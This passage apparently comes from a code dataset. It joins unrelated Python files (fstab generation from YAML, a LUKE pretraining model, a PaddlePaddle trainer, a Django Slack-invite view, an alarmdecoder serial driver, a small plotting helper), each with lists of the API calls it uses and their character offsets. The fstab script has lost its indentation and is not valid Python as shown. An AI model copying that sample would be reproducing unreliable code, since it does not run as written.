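predictions = np.array([[0.1, 0.7, 0.2],
                        [0.5, 0.3, 0.2]])
targets = np.array([1, 2])
k = 2
top_k = np.argsort(-predictions)[:, :k]  # indices of the k largest scores per row
target = targets.reshape(-1, 1)         # column vector, like reshape(targets, [-1, 1])
print(np.any(target == top_k, -1))        # [ True False]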
import os
import yaml # external library
def fstab(val="fstab.yaml"):
with open(val, "r") as yamlfile: #read yaml file
data = yaml.safe_load(yamlfile)
output: str=""
for sub in data['fstab']:
if (data['fstab'][sub]["type"]) == "nfs":
            output += (str(sub)+":" +data['fstab'][sub]["export"] + " ") # add fstab columns to string
output += ((data['fstab'][sub]["mount"]) + " ")
output += (data['fstab'][sub]["type"] + " ")
else:
output+=(str(sub) +" ") #add fstab sections to string
output+=((data['fstab'][sub]["mount"])+" ")
output+=(data['fstab'][sub]["type"]+" ")
try: #add optional values to string
for opt in data['fstab'][sub]["options"]:
output+=(opt+ ",")
        except KeyError: pass # the "options" key is optional
output+=("\n") #add new line to string
return output
if __name__ == '__main__':
yamls = input("Enter path to yaml file: ") # get path to yaml file
    if yamls == '': yamls ="fstab.yaml" # assume filename when input is omitted
out = fstab(yamls)
with open("fstab", "a") as text_file: # write fstab to file
text_file.write(out)
print("Checking fstab...")
try:
os.system("findmnt --verify --verbose ./fstab") # only works on unix
except:print("Can not check fstab, please run \"findmnt --verify --verbose ./fstab\" on unix.")
|
[
"yaml.safe_load",
"os.system"
] |
[((180, 204), 'yaml.safe_load', 'yaml.safe_load', (['yamlfile'], {}), '(yamlfile)\n', (194, 204), False, 'import yaml\n'), ((1558, 1605), 'os.system', 'os.system', (['"""findmnt --verify --verbose ./fstab"""'], {}), "('findmnt --verify --verbose ./fstab')\n", (1567, 1605), False, 'import os\n')]
|
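For reference, a minimal sketch of the YAML shape the fstab() function above appears to expect, inferred from the keys it reads (fstab, export, mount, type, options); the device and host names here are made up.
import yaml

example = """
fstab:
  /dev/sda1:
    mount: /
    type: ext4
    options:
      - noatime
  storage.example.com:
    export: /srv/share
    mount: /mnt/share
    type: nfs
"""
data = yaml.safe_load(example)
print(data["fstab"]["/dev/sda1"]["type"])  # ext4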
from typing import Optional
import torch
from torch import nn
from torch.nn import CrossEntropyLoss
from transformers.models.bert.modeling_bert import ACT2FN, BertPreTrainingHeads
from transformers.models.roberta.modeling_roberta import RobertaLMHead
from luke.model import LukeModel, LukeConfig
class EntityPredictionHeadTransform(nn.Module):
def __init__(self, config: LukeConfig):
super(EntityPredictionHeadTransform, self).__init__()
self.dense = nn.Linear(config.hidden_size, config.entity_emb_size)
if isinstance(config.hidden_act, str):
self.transform_act_fn = ACT2FN[config.hidden_act]
else:
self.transform_act_fn = config.hidden_act
self.LayerNorm = nn.LayerNorm(config.entity_emb_size, eps=config.layer_norm_eps)
def forward(self, hidden_states: torch.Tensor):
hidden_states = self.dense(hidden_states)
hidden_states = self.transform_act_fn(hidden_states)
hidden_states = self.LayerNorm(hidden_states)
return hidden_states
class EntityPredictionHead(nn.Module):
def __init__(self, config: LukeConfig):
super(EntityPredictionHead, self).__init__()
self.config = config
self.transform = EntityPredictionHeadTransform(config)
self.decoder = nn.Linear(config.entity_emb_size, config.entity_vocab_size, bias=False)
self.bias = nn.Parameter(torch.zeros(config.entity_vocab_size))
def forward(self, hidden_states: torch.Tensor):
hidden_states = self.transform(hidden_states)
hidden_states = self.decoder(hidden_states) + self.bias
return hidden_states
class LukePretrainingModel(LukeModel):
def __init__(self, config: LukeConfig):
super(LukePretrainingModel, self).__init__(config)
if self.config.bert_model_name and "roberta" in self.config.bert_model_name:
self.lm_head = RobertaLMHead(config)
self.lm_head.decoder.weight = self.embeddings.word_embeddings.weight
else:
self.cls = BertPreTrainingHeads(config)
self.cls.predictions.decoder.weight = self.embeddings.word_embeddings.weight
self.entity_predictions = EntityPredictionHead(config)
self.entity_predictions.decoder.weight = self.entity_embeddings.entity_embeddings.weight
self.apply(self.init_weights)
def forward(
self,
word_ids: torch.LongTensor,
word_segment_ids: torch.LongTensor,
word_attention_mask: torch.LongTensor,
entity_ids: torch.LongTensor,
entity_position_ids: torch.LongTensor,
entity_segment_ids: torch.LongTensor,
entity_attention_mask: torch.LongTensor,
masked_entity_labels: Optional[torch.LongTensor] = None,
masked_lm_labels: Optional[torch.LongTensor] = None,
**kwargs
):
model_dtype = next(self.parameters()).dtype # for fp16 compatibility
output = super(LukePretrainingModel, self).forward(
word_ids,
word_segment_ids,
word_attention_mask,
entity_ids,
entity_position_ids,
entity_segment_ids,
entity_attention_mask,
)
word_sequence_output, entity_sequence_output = output[:2]
loss_fn = CrossEntropyLoss(ignore_index=-1)
ret = dict(loss=word_ids.new_tensor(0.0, dtype=model_dtype))
if masked_entity_labels is not None:
entity_mask = masked_entity_labels != -1
if entity_mask.sum() > 0:
target_entity_sequence_output = torch.masked_select(entity_sequence_output, entity_mask.unsqueeze(-1))
target_entity_sequence_output = target_entity_sequence_output.view(-1, self.config.hidden_size)
target_entity_labels = torch.masked_select(masked_entity_labels, entity_mask)
entity_scores = self.entity_predictions(target_entity_sequence_output)
entity_scores = entity_scores.view(-1, self.config.entity_vocab_size)
ret["masked_entity_loss"] = loss_fn(entity_scores, target_entity_labels)
ret["masked_entity_correct"] = (torch.argmax(entity_scores, 1).data == target_entity_labels.data).sum()
ret["masked_entity_total"] = target_entity_labels.ne(-1).sum()
ret["loss"] += ret["masked_entity_loss"]
else:
ret["masked_entity_loss"] = word_ids.new_tensor(0.0, dtype=model_dtype)
ret["masked_entity_correct"] = word_ids.new_tensor(0, dtype=torch.long)
ret["masked_entity_total"] = word_ids.new_tensor(0, dtype=torch.long)
if masked_lm_labels is not None:
masked_lm_mask = masked_lm_labels != -1
if masked_lm_mask.sum() > 0:
masked_word_sequence_output = torch.masked_select(word_sequence_output, masked_lm_mask.unsqueeze(-1))
masked_word_sequence_output = masked_word_sequence_output.view(-1, self.config.hidden_size)
if self.config.bert_model_name and "roberta" in self.config.bert_model_name:
masked_lm_scores = self.lm_head(masked_word_sequence_output)
else:
masked_lm_scores = self.cls.predictions(masked_word_sequence_output)
masked_lm_scores = masked_lm_scores.view(-1, self.config.vocab_size)
masked_lm_labels = torch.masked_select(masked_lm_labels, masked_lm_mask)
ret["masked_lm_loss"] = loss_fn(masked_lm_scores, masked_lm_labels)
ret["masked_lm_correct"] = (torch.argmax(masked_lm_scores, 1).data == masked_lm_labels.data).sum()
ret["masked_lm_total"] = masked_lm_labels.ne(-1).sum()
ret["loss"] += ret["masked_lm_loss"]
else:
ret["masked_lm_loss"] = word_ids.new_tensor(0.0, dtype=model_dtype)
ret["masked_lm_correct"] = word_ids.new_tensor(0, dtype=torch.long)
ret["masked_lm_total"] = word_ids.new_tensor(0, dtype=torch.long)
return ret
|
[
"torch.masked_select",
"torch.argmax",
"torch.nn.CrossEntropyLoss",
"torch.nn.LayerNorm",
"transformers.models.roberta.modeling_roberta.RobertaLMHead",
"torch.nn.Linear",
"torch.zeros",
"transformers.models.bert.modeling_bert.BertPreTrainingHeads"
] |
[((474, 527), 'torch.nn.Linear', 'nn.Linear', (['config.hidden_size', 'config.entity_emb_size'], {}), '(config.hidden_size, config.entity_emb_size)\n', (483, 527), False, 'from torch import nn\n'), ((730, 793), 'torch.nn.LayerNorm', 'nn.LayerNorm', (['config.entity_emb_size'], {'eps': 'config.layer_norm_eps'}), '(config.entity_emb_size, eps=config.layer_norm_eps)\n', (742, 793), False, 'from torch import nn\n'), ((1294, 1365), 'torch.nn.Linear', 'nn.Linear', (['config.entity_emb_size', 'config.entity_vocab_size'], {'bias': '(False)'}), '(config.entity_emb_size, config.entity_vocab_size, bias=False)\n', (1303, 1365), False, 'from torch import nn\n'), ((3286, 3319), 'torch.nn.CrossEntropyLoss', 'CrossEntropyLoss', ([], {'ignore_index': '(-1)'}), '(ignore_index=-1)\n', (3302, 3319), False, 'from torch.nn import CrossEntropyLoss\n'), ((1399, 1436), 'torch.zeros', 'torch.zeros', (['config.entity_vocab_size'], {}), '(config.entity_vocab_size)\n', (1410, 1436), False, 'import torch\n'), ((1896, 1917), 'transformers.models.roberta.modeling_roberta.RobertaLMHead', 'RobertaLMHead', (['config'], {}), '(config)\n', (1909, 1917), False, 'from transformers.models.roberta.modeling_roberta import RobertaLMHead\n'), ((2036, 2064), 'transformers.models.bert.modeling_bert.BertPreTrainingHeads', 'BertPreTrainingHeads', (['config'], {}), '(config)\n', (2056, 2064), False, 'from transformers.models.bert.modeling_bert import ACT2FN, BertPreTrainingHeads\n'), ((3796, 3850), 'torch.masked_select', 'torch.masked_select', (['masked_entity_labels', 'entity_mask'], {}), '(masked_entity_labels, entity_mask)\n', (3815, 3850), False, 'import torch\n'), ((5418, 5471), 'torch.masked_select', 'torch.masked_select', (['masked_lm_labels', 'masked_lm_mask'], {}), '(masked_lm_labels, masked_lm_mask)\n', (5437, 5471), False, 'import torch\n'), ((4163, 4193), 'torch.argmax', 'torch.argmax', (['entity_scores', '(1)'], {}), '(entity_scores, 1)\n', (4175, 4193), False, 'import torch\n'), ((5601, 5634), 'torch.argmax', 'torch.argmax', (['masked_lm_scores', '(1)'], {}), '(masked_lm_scores, 1)\n', (5613, 5634), False, 'import torch\n')]
|
import os
import sys
import gzip
import paddle.v2 as paddle
import reader
from utils import logger, parse_train_cmd, build_dict, load_dict
from network_conf import fc_net, convolution_net
def train(topology,
train_data_dir=None,
test_data_dir=None,
word_dict_path=None,
label_dict_path=None,
model_save_dir="models",
batch_size=32,
num_passes=10):
"""
    train dnn model
    :params train_data_dir: path of training data; if this parameter
        is not specified, paddle.dataset.imdb will be used to run this example
    :type train_data_dir: str
    :params test_data_dir: path of testing data; if this parameter
        is not specified, paddle.dataset.imdb will be used to run this example
    :type test_data_dir: str
    :params word_dict_path: path of the word dictionary; if this parameter
        is not specified, a dictionary is automatically built from the
        training data
    :type word_dict_path: str
    :params num_passes: number of training passes
    :type num_passes: int
"""
if not os.path.exists(model_save_dir):
os.mkdir(model_save_dir)
use_default_data = (train_data_dir is None)
if use_default_data:
logger.info(("No training data are provided, "
"use paddle.dataset.imdb to train the model."))
logger.info("please wait to build the word dictionary ...")
word_dict = paddle.dataset.imdb.word_dict()
train_reader = paddle.batch(
paddle.reader.shuffle(
lambda: paddle.dataset.imdb.train(word_dict)(), buf_size=1000),
batch_size=100)
test_reader = paddle.batch(
lambda: paddle.dataset.imdb.test(word_dict)(), batch_size=100)
class_num = 2
else:
if word_dict_path is None or not os.path.exists(word_dict_path):
logger.info(("word dictionary is not given, the dictionary "
"is automatically built from the training data."))
# build the word dictionary to map the original string-typed
# words into integer-typed index
build_dict(
data_dir=train_data_dir,
save_path=word_dict_path,
use_col=1,
cutoff_fre=5,
insert_extra_words=["<UNK>"])
if not os.path.exists(label_dict_path):
logger.info(("label dictionary is not given, the dictionary "
"is automatically built from the training data."))
# build the label dictionary to map the original string-typed
# label into integer-typed index
build_dict(
data_dir=train_data_dir, save_path=label_dict_path, use_col=0)
word_dict = load_dict(word_dict_path)
lbl_dict = load_dict(label_dict_path)
class_num = len(lbl_dict)
logger.info("class number is : %d." % (len(lbl_dict)))
train_reader = paddle.batch(
paddle.reader.shuffle(
reader.train_reader(train_data_dir, word_dict, lbl_dict),
buf_size=1000),
batch_size=batch_size)
if test_data_dir is not None:
# here, because training and testing data share a same format,
# we still use the reader.train_reader to read the testing data.
test_reader = paddle.batch(
paddle.reader.shuffle(
reader.train_reader(test_data_dir, word_dict, lbl_dict),
buf_size=1000),
batch_size=batch_size)
else:
test_reader = None
dict_dim = len(word_dict)
logger.info("length of word dictionary is : %d." % (dict_dim))
paddle.init(use_gpu=False, trainer_count=1)
# network config
cost, prob, label = topology(dict_dim, class_num)
# create parameters
parameters = paddle.parameters.create(cost)
# create optimizer
adam_optimizer = paddle.optimizer.Adam(
learning_rate=1e-3,
regularization=paddle.optimizer.L2Regularization(rate=1e-3),
model_average=paddle.optimizer.ModelAverage(average_window=0.5))
# create trainer
trainer = paddle.trainer.SGD(
cost=cost,
extra_layers=paddle.evaluator.auc(input=prob, label=label),
parameters=parameters,
update_equation=adam_optimizer)
# begin training network
feeding = {"word": 0, "label": 1}
def _event_handler(event):
"""
Define end batch and end pass event handler
"""
if isinstance(event, paddle.event.EndIteration):
if event.batch_id % 100 == 0:
logger.info("Pass %d, Batch %d, Cost %f, %s\n" % (
event.pass_id, event.batch_id, event.cost, event.metrics))
if isinstance(event, paddle.event.EndPass):
if test_reader is not None:
result = trainer.test(reader=test_reader, feeding=feeding)
logger.info("Test at Pass %d, %s \n" % (event.pass_id,
result.metrics))
with gzip.open(
os.path.join(model_save_dir, "dnn_params_pass_%05d.tar.gz" %
event.pass_id), "w") as f:
trainer.save_parameter_to_tar(f)
trainer.train(
reader=train_reader,
event_handler=_event_handler,
feeding=feeding,
num_passes=num_passes)
logger.info("Training has finished.")
def main(args):
if args.nn_type == "dnn":
topology = fc_net
elif args.nn_type == "cnn":
topology = convolution_net
train(
topology=topology,
train_data_dir=args.train_data_dir,
test_data_dir=args.test_data_dir,
word_dict_path=args.word_dict,
label_dict_path=args.label_dict,
batch_size=args.batch_size,
num_passes=args.num_passes,
model_save_dir=args.model_save_dir)
if __name__ == "__main__":
args = parse_train_cmd()
if args.train_data_dir is not None:
assert args.word_dict and args.label_dict, (
"the parameter train_data_dir, word_dict_path, and label_dict_path "
"should be set at the same time.")
main(args)
|
[
"reader.train_reader",
"os.mkdir",
"paddle.v2.init",
"paddle.v2.optimizer.L2Regularization",
"utils.logger.info",
"utils.build_dict",
"os.path.join",
"paddle.v2.dataset.imdb.word_dict",
"os.path.exists",
"paddle.v2.dataset.imdb.test",
"paddle.v2.evaluator.auc",
"utils.parse_train_cmd",
"paddle.v2.optimizer.ModelAverage",
"paddle.v2.parameters.create",
"utils.load_dict",
"paddle.v2.dataset.imdb.train"
] |
[((3658, 3718), 'utils.logger.info', 'logger.info', (["('length of word dictionary is : %d.' % dict_dim)"], {}), "('length of word dictionary is : %d.' % dict_dim)\n", (3669, 3718), False, 'from utils import logger, parse_train_cmd, build_dict, load_dict\n'), ((3726, 3769), 'paddle.v2.init', 'paddle.init', ([], {'use_gpu': '(False)', 'trainer_count': '(1)'}), '(use_gpu=False, trainer_count=1)\n', (3737, 3769), True, 'import paddle.v2 as paddle\n'), ((3888, 3918), 'paddle.v2.parameters.create', 'paddle.parameters.create', (['cost'], {}), '(cost)\n', (3912, 3918), True, 'import paddle.v2 as paddle\n'), ((5470, 5507), 'utils.logger.info', 'logger.info', (['"""Training has finished."""'], {}), "('Training has finished.')\n", (5481, 5507), False, 'from utils import logger, parse_train_cmd, build_dict, load_dict\n'), ((6010, 6027), 'utils.parse_train_cmd', 'parse_train_cmd', ([], {}), '()\n', (6025, 6027), False, 'from utils import logger, parse_train_cmd, build_dict, load_dict\n'), ((1070, 1100), 'os.path.exists', 'os.path.exists', (['model_save_dir'], {}), '(model_save_dir)\n', (1084, 1100), False, 'import os\n'), ((1110, 1134), 'os.mkdir', 'os.mkdir', (['model_save_dir'], {}), '(model_save_dir)\n', (1118, 1134), False, 'import os\n'), ((1218, 1317), 'utils.logger.info', 'logger.info', (['"""No training data are provided, use paddle.dataset.imdb to train the model."""'], {}), "(\n 'No training data are provided, use paddle.dataset.imdb to train the model.'\n )\n", (1229, 1317), False, 'from utils import logger, parse_train_cmd, build_dict, load_dict\n'), ((1342, 1401), 'utils.logger.info', 'logger.info', (['"""please wait to build the word dictionary ..."""'], {}), "('please wait to build the word dictionary ...')\n", (1353, 1401), False, 'from utils import logger, parse_train_cmd, build_dict, load_dict\n'), ((1423, 1454), 'paddle.v2.dataset.imdb.word_dict', 'paddle.dataset.imdb.word_dict', ([], {}), '()\n', (1452, 1454), True, 'import paddle.v2 as paddle\n'), ((2772, 2797), 'utils.load_dict', 'load_dict', (['word_dict_path'], {}), '(word_dict_path)\n', (2781, 2797), False, 'from utils import logger, parse_train_cmd, build_dict, load_dict\n'), ((2818, 2844), 'utils.load_dict', 'load_dict', (['label_dict_path'], {}), '(label_dict_path)\n', (2827, 2844), False, 'from utils import logger, parse_train_cmd, build_dict, load_dict\n'), ((1864, 1980), 'utils.logger.info', 'logger.info', (['"""word dictionary is not given, the dictionary is automatically built from the training data."""'], {}), "(\n 'word dictionary is not given, the dictionary is automatically built from the training data.'\n )\n", (1875, 1980), False, 'from utils import logger, parse_train_cmd, build_dict, load_dict\n'), ((2132, 2252), 'utils.build_dict', 'build_dict', ([], {'data_dir': 'train_data_dir', 'save_path': 'word_dict_path', 'use_col': '(1)', 'cutoff_fre': '(5)', 'insert_extra_words': "['<UNK>']"}), "(data_dir=train_data_dir, save_path=word_dict_path, use_col=1,\n cutoff_fre=5, insert_extra_words=['<UNK>'])\n", (2142, 2252), False, 'from utils import logger, parse_train_cmd, build_dict, load_dict\n'), ((2346, 2377), 'os.path.exists', 'os.path.exists', (['label_dict_path'], {}), '(label_dict_path)\n', (2360, 2377), False, 'import os\n'), ((2391, 2508), 'utils.logger.info', 'logger.info', (['"""label dictionary is not given, the dictionary is automatically built from the training data."""'], {}), "(\n 'label dictionary is not given, the dictionary is automatically built from the training data.'\n )\n", (2402, 2508), False, 'from utils import logger, parse_train_cmd, build_dict, load_dict\n'), ((2660, 2733), 'utils.build_dict', 'build_dict', ([], {'data_dir': 'train_data_dir', 'save_path': 'label_dict_path', 'use_col': '(0)'}), '(data_dir=train_data_dir, save_path=label_dict_path, use_col=0)\n', (2670, 2733), False, 'from utils import logger, parse_train_cmd, build_dict, load_dict\n'), ((4038, 4083), 'paddle.v2.optimizer.L2Regularization', 'paddle.optimizer.L2Regularization', ([], {'rate': '(0.001)'}), '(rate=0.001)\n', (4071, 4083), True, 'import paddle.v2 as paddle\n'), ((4106, 4155), 'paddle.v2.optimizer.ModelAverage', 'paddle.optimizer.ModelAverage', ([], {'average_window': '(0.5)'}), '(average_window=0.5)\n', (4135, 4155), True, 'import paddle.v2 as paddle\n'), ((4253, 4298), 'paddle.v2.evaluator.auc', 'paddle.evaluator.auc', ([], {'input': 'prob', 'label': 'label'}), '(input=prob, label=label)\n', (4273, 4298), True, 'import paddle.v2 as paddle\n'), ((1820, 1850), 'os.path.exists', 'os.path.exists', (['word_dict_path'], {}), '(word_dict_path)\n', (1834, 1850), False, 'import os\n'), ((3031, 3087), 'reader.train_reader', 'reader.train_reader', (['train_data_dir', 'word_dict', 'lbl_dict'], {}), '(train_data_dir, word_dict, lbl_dict)\n', (3050, 3087), False, 'import reader\n'), ((4662, 4775), 'utils.logger.info', 'logger.info', (["('Pass %d, Batch %d, Cost %f, %s\\n' % (event.pass_id, event.batch_id, event\n .cost, event.metrics))"], {}), "('Pass %d, Batch %d, Cost %f, %s\\n' % (event.pass_id, event.\n batch_id, event.cost, event.metrics))\n", (4673, 4775), False, 'from utils import logger, parse_train_cmd, build_dict, load_dict\n'), ((4976, 5047), 'utils.logger.info', 'logger.info', (["('Test at Pass %d, %s \\n' % (event.pass_id, result.metrics))"], {}), "('Test at Pass %d, %s \\n' % (event.pass_id, result.metrics))\n", (4987, 5047), False, 'from utils import logger, parse_train_cmd, build_dict, load_dict\n'), ((1691, 1726), 'paddle.v2.dataset.imdb.test', 'paddle.dataset.imdb.test', (['word_dict'], {}), '(word_dict)\n', (1715, 1726), True, 'import paddle.v2 as paddle\n'), ((3446, 3501), 'reader.train_reader', 'reader.train_reader', (['test_data_dir', 'word_dict', 'lbl_dict'], {}), '(test_data_dir, word_dict, lbl_dict)\n', (3465, 3501), False, 'import reader\n'), ((5152, 5227), 'os.path.join', 'os.path.join', (['model_save_dir', "('dnn_params_pass_%05d.tar.gz' % event.pass_id)"], {}), "(model_save_dir, 'dnn_params_pass_%05d.tar.gz' % event.pass_id)\n", (5164, 5227), False, 'import os\n'), ((1551, 1587), 'paddle.v2.dataset.imdb.train', 'paddle.dataset.imdb.train', (['word_dict'], {}), '(word_dict)\n', (1576, 1587), True, 'import paddle.v2 as paddle\n')]
|
import structlog
from rest_framework import exceptions, permissions, status, viewsets
from rest_framework.response import Response
from lego.apps.stats.utils import track
from .serializers import SlackInviteSerializer
from .utils import SlackException, SlackInvite
log = structlog.get_logger()
class SlackInviteViewSet(viewsets.ViewSet):
"""
Invite an email to our slack team.
"""
permission_classes = [permissions.IsAuthenticated]
def create(self, request, *args, **kwargs):
serializer = SlackInviteSerializer(data=request.data)
serializer.is_valid(raise_exception=True)
self.perform_create(serializer)
return Response(serializer.data, status=status.HTTP_201_CREATED)
def perform_create(self, serializer):
email = serializer.validated_data['email']
try:
slack_invite = SlackInvite()
slack_invite.invite(email)
track(self.request.user, 'slack.invite', properties={'email': email})
except SlackException as ex:
log.warn('slack_invite_failed', email=email, exception=str(ex))
raise exceptions.ValidationError({'detail': str(ex)})
|
[
"lego.apps.stats.utils.track",
"rest_framework.response.Response",
"structlog.get_logger"
] |
[((274, 296), 'structlog.get_logger', 'structlog.get_logger', ([], {}), '()\n', (294, 296), False, 'import structlog\n'), ((670, 727), 'rest_framework.response.Response', 'Response', (['serializer.data'], {'status': 'status.HTTP_201_CREATED'}), '(serializer.data, status=status.HTTP_201_CREATED)\n', (678, 727), False, 'from rest_framework.response import Response\n'), ((928, 997), 'lego.apps.stats.utils.track', 'track', (['self.request.user', '"""slack.invite"""'], {'properties': "{'email': email}"}), "(self.request.user, 'slack.invite', properties={'email': email})\n", (933, 997), False, 'from lego.apps.stats.utils import track\n')]
|
"""
This module contains the :py:class:`SerialDevice` interface for the `AD2USB`_, `AD2SERIAL`_ or `AD2PI`_.
.. _AD2USB: http://www.alarmdecoder.com
.. _AD2SERIAL: http://www.alarmdecoder.com
.. _AD2PI: http://www.alarmdecoder.com
.. moduleauthor:: <NAME> <<EMAIL>>
"""
import threading
import serial
import serial.tools.list_ports
import select
import sys
from .base_device import Device
from ..util import CommError, TimeoutError, NoDeviceError, bytes_hack
class SerialDevice(Device):
"""
`AD2USB`_, `AD2SERIAL`_ or `AD2PI`_ device utilizing the PySerial interface.
"""
# Constants
BAUDRATE = 19200
"""Default baudrate for Serial devices."""
@staticmethod
def find_all(pattern=None):
"""
Returns all serial ports present.
:param pattern: pattern to search for when retrieving serial ports
:type pattern: string
:returns: list of devices
:raises: :py:class:`~alarmdecoder.util.CommError`
"""
devices = []
try:
if pattern:
devices = serial.tools.list_ports.grep(pattern)
else:
devices = serial.tools.list_ports.comports()
except serial.SerialException as err:
raise CommError('Error enumerating serial devices: {0}'.format(str(err)), err)
return devices
@property
def interface(self):
"""
Retrieves the interface used to connect to the device.
:returns: interface used to connect to the device
"""
return self._port
@interface.setter
def interface(self, value):
"""
Sets the interface used to connect to the device.
:param value: name of the serial device
:type value: string
"""
self._port = value
def __init__(self, interface=None):
"""
Constructor
:param interface: device to open
:type interface: string
"""
Device.__init__(self)
self._port = interface
self._id = interface
# Timeout = non-blocking to match pyftdi.
self._device = serial.Serial(timeout=0, writeTimeout=0)
def open(self, baudrate=BAUDRATE, no_reader_thread=False):
"""
Opens the device.
:param baudrate: baudrate to use with the device
:type baudrate: int
:param no_reader_thread: whether or not to automatically start the
reader thread.
:type no_reader_thread: bool
:raises: :py:class:`~alarmdecoder.util.NoDeviceError`
"""
# Set up the defaults
if baudrate is None:
baudrate = SerialDevice.BAUDRATE
if self._port is None:
raise NoDeviceError('No device interface specified.')
self._read_thread = Device.ReadThread(self)
# Open the device and start up the reader thread.
try:
self._device.port = self._port
self._device.open()
# NOTE: Setting the baudrate before opening the
# port caused issues with Moschip 7840/7820
# USB Serial Driver converter. (mos7840)
#
# Moving it to this point seems to resolve
# all issues with it.
self._device.baudrate = baudrate
except (serial.SerialException, ValueError, OSError) as err:
raise NoDeviceError('Error opening device on {0}.'.format(self._port), err)
else:
self._running = True
self.on_open()
if not no_reader_thread:
self._read_thread.start()
return self
def close(self):
"""
Closes the device.
"""
try:
Device.close(self)
except Exception:
pass
def fileno(self):
"""
Returns the file number associated with the device
:returns: int
"""
return self._device.fileno()
def write(self, data):
"""
Writes data to the device.
:param data: data to write
:type data: string
:raises: py:class:`~alarmdecoder.util.CommError`
"""
try:
# Hack to support unicode under Python 2.x
if isinstance(data, str) or (sys.version_info < (3,) and isinstance(data, unicode)):
data = data.encode('utf-8')
self._device.write(data)
except serial.SerialTimeoutException:
pass
except serial.SerialException as err:
raise CommError('Error writing to device.', err)
else:
self.on_write(data=data)
def read(self):
"""
Reads a single character from the device.
:returns: character read from the device
:raises: :py:class:`~alarmdecoder.util.CommError`
"""
        data = b''  # bytes, so the decode below succeeds even when nothing was read
try:
read_ready, _, _ = select.select([self._device.fileno()], [], [], 0.5)
if len(read_ready) != 0:
data = self._device.read(1)
except serial.SerialException as err:
raise CommError('Error reading from device: {0}'.format(str(err)), err)
return data.decode('utf-8')
def read_line(self, timeout=0.0, purge_buffer=False):
"""
Reads a line from the device.
:param timeout: read timeout
:type timeout: float
:param purge_buffer: Indicates whether to purge the buffer prior to
reading.
:type purge_buffer: bool
:returns: line that was read
:raises: :py:class:`~alarmdecoder.util.CommError`, :py:class:`~alarmdecoder.util.TimeoutError`
"""
def timeout_event():
"""Handles read timeout event"""
timeout_event.reading = False
timeout_event.reading = True
if purge_buffer:
self._buffer = b''
        got_line, data = False, b''
timer = threading.Timer(timeout, timeout_event)
if timeout > 0:
timer.start()
leftovers = b''
try:
while timeout_event.reading and not got_line:
read_ready, _, _ = select.select([self._device.fileno()], [], [], 0.5)
if len(read_ready) == 0:
continue
bytes_avail = 0
if hasattr(self._device, "in_waiting"):
bytes_avail = self._device.in_waiting
else:
bytes_avail = self._device.inWaiting()
buf = self._device.read(bytes_avail)
for idx in range(len(buf)):
c = buf[idx]
ub = bytes_hack(c)
if sys.version_info > (3,):
ub = bytes([ub])
                    # NOTE: AD2SERIAL and AD2PI apparently send down \xFF on boot.
if ub != b'' and ub != b"\xff":
self._buffer += ub
if ub == b"\n":
self._buffer = self._buffer.strip(b"\r\n")
if len(self._buffer) > 0:
got_line = True
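                        # Keep whatever follows the terminator in this chunk for the next read_line() call.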
leftovers = buf[idx:]
break
except (OSError, serial.SerialException) as err:
raise CommError('Error reading from device: {0}'.format(str(err)), err)
else:
if got_line:
data, self._buffer = self._buffer, leftovers
self.on_read(data=data)
else:
raise TimeoutError('Timeout while waiting for line terminator.')
finally:
timer.cancel()
return data.decode('utf-8')
def purge(self):
"""
Purges read/write buffers.
"""
self._device.flushInput()
self._device.flushOutput()
|
[
"serial.Serial",
"threading.Timer",
"serial.tools.list_ports.grep",
"serial.tools.list_ports.comports"
] |
[((2130, 2170), 'serial.Serial', 'serial.Serial', ([], {'timeout': '(0)', 'writeTimeout': '(0)'}), '(timeout=0, writeTimeout=0)\n', (2143, 2170), False, 'import serial\n'), ((5989, 6028), 'threading.Timer', 'threading.Timer', (['timeout', 'timeout_event'], {}), '(timeout, timeout_event)\n', (6004, 6028), False, 'import threading\n'), ((1075, 1112), 'serial.tools.list_ports.grep', 'serial.tools.list_ports.grep', (['pattern'], {}), '(pattern)\n', (1103, 1112), False, 'import serial\n'), ((1157, 1191), 'serial.tools.list_ports.comports', 'serial.tools.list_ports.comports', ([], {}), '()\n', (1189, 1191), False, 'import serial\n')]
|
import os
from django import template
from djangobench.utils import run_benchmark
def benchmark():
context = template.Context({
'stuff': 'something'
});
t = template.Template('{{ stuff }}')
t.render(context)
run_benchmark(
benchmark,
syncdb = False,
meta = {
'description': 'Render an extremely simple template (from string)',
}
)
|
[
"djangobench.utils.run_benchmark",
"django.template.Context",
"django.template.Template"
] |
[((234, 351), 'djangobench.utils.run_benchmark', 'run_benchmark', (['benchmark'], {'syncdb': '(False)', 'meta': "{'description': 'Render an extremely simple template (from string)'}"}), "(benchmark, syncdb=False, meta={'description':\n 'Render an extremely simple template (from string)'})\n", (247, 351), False, 'from djangobench.utils import run_benchmark\n'), ((114, 154), 'django.template.Context', 'template.Context', (["{'stuff': 'something'}"], {}), "({'stuff': 'something'})\n", (130, 154), False, 'from django import template\n'), ((178, 210), 'django.template.Template', 'template.Template', (['"""{{ stuff }}"""'], {}), "('{{ stuff }}')\n", (195, 210), False, 'from django import template\n')]
|
import numpy as np
import pylab as pl
from gls import sinefitm
from multiplot import dofig, doaxes
fac1 = 100
fac2 = 1
fac3 = 1
ls = ['-','--',':','-.']
mrk = ['.',',','+','x']
col = ['k','c','m','y']
def plotTS(time, y1, y2, y3 = None, figno = 1, discrete = True, \
savefile = None, period = None, xper = False):
'''Plot light and RV curve(s)'''
M, N = np.shape(y1)
if discrete == True:
m1 = np.copy(mrk)
else:
m1 = np.copy(ls)
if (xper == True) * (not(period is None)):
tt = time / period - 0.5
xr = [-0.5,0.5]
xttl = 'phase'
else:
tt = time
xr = np.nanmin(time), np.nanmax(time)
xttl = 'time (days)'
if y3 is None:
ny = 2
else:
ny = 3
ee = dofig(figno, 1, ny, aspect = 1)
ax1 = doaxes(ee, 1, ny, 0, 0)
for i in np.arange(M):
pl.plot(tt, y1[i,:] * fac1, m1[i], c = col[i])
pl.ylabel(r"$\Delta F$ (\%)")
ymin = np.nanmin(y1) * fac1
ymax = np.nanmax(y1) * fac1
yr = ymax - ymin
pl.ylim(ymin - 0.1 * yr, ymax + 0.1 * yr)
ax2 = doaxes(ee, 1, ny, 0, 1, sharex = ax1)
for i in np.arange(M):
pl.plot(tt, y2[i,:] * fac2, m1[i], c = col[i])
pl.ylabel(r"$\Delta V$ (m/s)")
ymin = np.nanmin(y2) * fac2
ymax = np.nanmax(y2) * fac2
yr = ymax - ymin
pl.ylim(ymin - 0.1 * yr, ymax + 0.1 * yr)
if not(y3 is None):
ax3 = doaxes(ee, 1, ny, 0, 2, sharex = ax1)
for i in np.arange(M):
pl.plot(tt, y3[i,:] * fac2, m1[i], c = col[i])
